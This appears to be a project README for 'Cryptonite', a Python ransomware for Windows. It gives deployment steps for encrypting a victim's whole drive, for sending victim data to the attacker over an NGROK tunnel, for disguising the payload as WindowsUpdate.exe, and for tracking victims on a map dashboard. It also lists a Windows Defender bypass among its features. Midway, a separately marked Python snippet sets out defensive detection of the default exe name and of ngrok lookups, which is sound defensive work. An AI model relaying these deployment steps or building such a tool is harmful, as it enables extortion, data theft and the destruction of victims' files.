Cryptonite A Ransomware for Windows OS

Cryptonite was developed with the aim of achieving maximum output with minimum effort. Anyone can learn to use Cryptonite. I have included two versions of Cryptonite: one that stores data using SQLite3 and another that uses MongoDB Atlas to push the results into the cloud. The default method is SQLite3; if you are interested in using the MongoDB version of Cryptonite, switch to the mongo branch of this repository.

The steps below will guide you through using Cryptonite in detail (subject to change as I add new concepts


  •  Encrypt all files except system specific ones
  •  Encryption must only be decryptable with a special key
  •  Send the credentials of the victim to the attacker via secure tunnel, preferably NGROK
  •  Pop up box should appear after encryption asking for ransom
  •  Create a server to retrieve information sent by the victim
  •  Add custom extension to encrypted files
  •  Create an exe file generator
  •  Graphical User Interface (Victim side)
  •  Graphical User Interface (Attacker side)
  •  Create Windows Defender bypass script

Setting Up For The First Time

The following setups need to be done if you are using Cryptonite for the first time.

Create an NGROK account

  • Visit NGROK
  • Signup for an account. If you can spare some money, then buy the premium version. Else, the free version will suffice.
  • Login to NGROK
  • Download the suitable release of NGROK for your operating system.
  • Unzip and install NGROK.
    • For Linux / MAC users, unzip the folder via terminal: unzip /path/to/
    • For Windows users, just unzip the folder
    • Make sure to add ngrok to PATH
  • Authenticate your NGROK:
    • Copy your AUTH TOKEN from NGROK SETUP PAGE
    • For Windows users, open cmd and type (replace YOUR_AUTH_TOKEN_HERE with your authtoken):
      ngrok authtoken YOUR_AUTH_TOKEN_HERE
    • For Linux / MAC users, open terminal and type (replace YOUR_AUTH_TOKEN_HERE with your authtoken):
      ngrok authtoken YOUR_AUTH_TOKEN_HERE

Install the Python requirements for Cryptonite:

pip install -r "requirements.txt"  

Firing Up The Server

Run the file before you send the ransomware to victims. The starts the server to receive victim’s data sent by Cryptonite and creates an NGROK tunnel that performs port forwarding so that our server can be accessed by anyone around the world. Running also creates a DB file to store the victims’ info.

❗ Make sure that runs all the time.

Copy the NGROK URL generated in the terminal. It will be useful in the next step.

Filling Up The Details

  • Run and fill up the necessary details.
  • By default, Cryptonite is going to encrypt the contents of the folder named testfolder found in the directory where is run. But if you want to specify some different path, say the entire system, then make sure to edit this line by replacing ./testfolder with / before executing. Don't forget to save.
  • Running will create an exe file that can be shipped to the victim.
        for root, dir, file in os.walk('./testfolder'):

Test It On Your Computer

Believe me when I say this… You can safely test this Ransomware on your device provided you mention the correct path to the folder you are testing on. I have already created a testing folder and the path has also been given, so it's easier for you to see for yourself. What you need to do is run, execute and see the magic happen. If you wish to create your own folder and test it there, then mention the absolute path of the folder in place of ./testfolder.

Do not give the base folder (/) for testing purposes

Never give the base folder for testing purposes, as it will initiate the encryption of all the files (except the files inside these folders). Please refrain from using the base folder unless you are absolutely sure of what you are doing. To be on the safer side, I have already created a testfolder and set the default value of the Encryption Folder Path to testfolder. Therefore, even if you accidentally run this Ransomware, it will only encrypt the testfolder and not the entire system.

Send It To Your Victims

After we have tested our Ransomware, we intend to send it to the victims in the form of an exe file. I have created a python script that will generate an exe file of custom name. By default the name would be WindowsUpdate.exe. But you can change it anytime you want using

Remember, creating an exe will take quite a long time (up to five minutes!), hence chill and wait out the process and do not close during exe file generation. exeGen will automatically close itself after the exe file has been generated.

Things to consider before sending the exe file

  • Make sure that the Encryption Folder Path is changed from ./testfolder to / (if you are going for system wide encryption) or any folder path of your choice.
  • All the Details should be correctly filled.
  • NGROK and the must run all the time. Failure of which can result in Ransomware not being able to encrypt files (a popup of network error will be shown on the victim’s screen and the Ransomware terminates).
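
From the defender's side, two details stated above are usable detection signals: the default generated name WindowsUpdate.exe and the hard dependency on a live NGROK tunnel. The following is an added example, not part of Cryptonite's code; the event schema, the trusted-path list and the ngrok domain list are assumptions, and the sample events are constructed.

```python
from pathlib import PureWindowsPath

# ngrok-operated tunnel domains (assumption: verify against current ngrok docs).
NGROK_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app", ".ngrok.dev")
# Default generated exe name stated on this page; the page notes it can be changed.
DEFAULT_EXE_NAME = "windowsupdate.exe"
# Install roots this example treats as trusted (assumption).
TRUSTED_ROOTS = (PureWindowsPath(r"C:\Windows"), PureWindowsPath(r"C:\Program Files"))

# Constructed sample telemetry; the event schema is hypothetical.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4120, "image": r"C:\Users\alice\Downloads\WindowsUpdate.exe"},
    {"type": "dns_query", "pid": 4120, "query": "example-tunnel.ngrok.io"},
    {"type": "process_create", "pid": 988, "image": r"C:\Windows\System32\svchost.exe"},
    {"type": "dns_query", "pid": 988, "query": "update.example.com"},
    {"type": "process_create", "pid": 5200, "image": r"C:\Users\bob\AppData\Local\Temp\invoice.exe"},
    {"type": "dns_query", "pid": 5200, "query": "abcd1234.ngrok-free.app"},
]

def is_ngrok_host(host):
    """True when a queried hostname sits under an ngrok tunnel domain."""
    host = host.lower().rstrip(".")
    return any(host.endswith(suffix) for suffix in NGROK_SUFFIXES)

def in_trusted_root(image):
    """True when the image path lies under a trusted root (case-insensitive)."""
    return any(root in PureWindowsPath(image).parents for root in TRUSTED_ROOTS)

def score_events(events):
    """Map pid -> set of signal tags for processes outside trusted roots."""
    images, findings = {}, {}
    for ev in events:
        if ev["type"] == "process_create":
            images[ev["pid"]] = ev["image"]
            name = PureWindowsPath(ev["image"]).name.lower()
            if name == DEFAULT_EXE_NAME and not in_trusted_root(ev["image"]):
                findings.setdefault(ev["pid"], set()).add("default_exe_name")
        elif ev["type"] == "dns_query" and is_ngrok_host(ev["query"]):
            if not in_trusted_root(images.get(ev["pid"], "")):
                findings.setdefault(ev["pid"], set()).add("ngrok_lookup")
    return findings

def high_confidence(findings):
    """Pids showing both signals: the default exe name and an ngrok lookup."""
    both = {"default_exe_name", "ngrok_lookup"}
    return sorted(pid for pid, tags in findings.items() if tags == both)

if __name__ == "__main__":
    for pid, tags in sorted(score_events(SAMPLE_EVENTS).items()):
        print(pid, sorted(tags))
```

Because the page states that the ransomware shows a network error and terminates when the tunnel is unreachable, denying egress to ngrok domains on hosts with no business need for them is a mitigation as well as a detection point.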

Cryptonite Command Center

An all in one monitoring dashboard created to understand the level of destruction caused by this ransomware. The attacker can get to know the location of his victims plotted on a map with high precision. His IP address, hostname, place and other information are stored in a database and presented to the attacker in a neat table. Search and delete functionality has also been added. Grab a cup of coffee and sip on it while Cryptonite does all the hard work.

Points to note…

  • The Cryptonite Command Center can be accessed by running the file.
  • Always use the inbuilt RELOAD button to reload the Command Center in case the values don’t match up.

Cryptonite by CYBERDEVILZ

Fully functional ransomware developed solely using Python that uses minimum resources to give maximum output.